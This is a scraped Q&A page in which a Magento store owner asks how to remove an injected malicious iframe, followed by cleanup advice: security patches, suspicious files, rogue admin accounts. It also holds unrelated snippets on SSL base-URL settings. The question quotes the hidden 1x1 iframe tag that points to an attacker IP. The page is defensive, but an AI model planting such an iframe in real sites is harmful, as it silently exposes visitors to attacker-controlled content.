Magento – How to remove magento malware

iframemagento-1.9Security

my website was hacked and know it contains an <iframe> malware according with Google Webmaster Tools. It appears to be in a page that doesn't exist, example: domain.com/?page_id=4712

And this is the script malware:

<iframe src="http://77.221.145.25/admincpxc/?954Y"width="1" height="1" frameborder="0">

Best Answer

Got totally same problem. This is a remote code execution exploit. You need to install SUPEE-5344, SUPEE-1533. And read this article: http://magento.com/security-patch

Be sure to clear all malicious files. Go to skin/skinmain.php and look on it's creation date. Delete all the files with same creation date. It may be enough. Install patches after that.

I'm still cleaning it myself. Can't acces users control panel. Guess there's new admins there to be found. Good luck.

Related Solutions

Magento – How to use cloudflare free SSL with Magento

SSL is managed from the web server (apache, nginx, etc..). Magento has only to know if the domain has a ssl certificate. So, once you changed the fields like below, in core_config_data table:

web/unsecure/base_url => http://www.yourdomain.com
web/secure/base_url => https://www.yourdomain.com

magento will run perfectly! Of course, you have to set YES in "Use Secure URLs" in Admin. Other fields can stay like this:

web/unsecure/base_link_url => {{unsecure_base_url}}
web/unsecure/base_skin_url => {{unsecure_base_url}}skin/
web/unsecure/base_media_url => {{unsecure_base_url}}media/
web/unsecure/base_js_url => {{unsecure_base_url}}js/
web/secure/base_link_url => {{secure_base_url}}
web/secure/base_skin_url => {{secure_base_url}}skin/
web/secure/base_media_url   => {{secure_base_url}}media/
web/secure/base_js_url => {{secure_base_url}}js/

Magento – Magento Admin was hacked and show another page

Take the site offline immediately and then start investigating the PHP code and other files.

Best Answer

Related Solutions

Magento – How to use cloudflare free SSL with Magento

Magento – Magento Admin was hacked and show another page

Related Topic